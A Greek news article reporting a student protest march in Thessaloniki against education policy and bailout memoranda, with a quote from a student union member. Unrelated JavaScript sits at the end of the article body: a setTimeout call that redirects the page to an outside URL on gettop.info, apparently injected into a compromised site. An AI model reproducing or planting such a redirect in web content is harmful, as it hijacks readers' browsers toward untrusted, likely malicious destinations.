Πορεία διαμαρτυρίας φοιτητών στο κέντρο της Θεσσαλονίκης

0
11

 

Στο υπουργείο Μακεδονίας- Θράκης κατέληξε το μεσημέρι η πορεία διαμαρτυρίας, που πραγματοποίησαν σε κεντρικούς δρόμους της Θεσσαλονίκης φοιτητικοί και σπουδαστικοί σύλλογοι, στο πλαίσιο πανελλαδικής κινητοποίησης του Μετώπου Αγώνα Σπουδαστών (ΜΑΣ).

Οι φοιτητές συγκεντρώθηκαν μπροστά από το άγαλμα Βενιζέλου, στην Πλατεία Αρχαίας Αγοράς και κινήθηκαν στις οδούς Εγνατία, Αγίας Σοφίας, Τσιμισκή και Βενίζελου, διαδηλώνοντας κατά των πολιτικών της κυβέρνησης στα θέματα παιδείας και κατά των μνημονίων. Στην εξωτερική είσοδο του Διοικητηρίου (ΥΜΑ-Θ) ανάρτησαν πανό με το σύνθημα «Δεν χαρίζουμε τις σπουδές μας και το μέλλον μας σε κυβέρνηση- ΕΕ- ΔΝΤ«.

«Στη σημερινή κινητοποίηση συμμετείχαν σύλλογοι φοιτητών από το ΑΠΘ, το Πανεπιστήμιο Μακεδονίας και το ΤΕΙ Θεσσαλονίκης. Θα συνεχίσουμε τον αγώνα για δωρεάν σπουδές και για το μέλλον που μας αξίζει και μας στερούν» δήλωσε στο ΑΠΕ-ΜΠΕ το μέλος της γραμματείας του ΜΑΣ, Γιάννης Βασιλειάδης. «Δεν θα κάνουμε βήμα πίσω, συνεχίζουμε με τοπικές κινητοποιήσεις αλλά και με συμμετοχή στην πανελλαδική εργατική απεργία» κατέληξε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here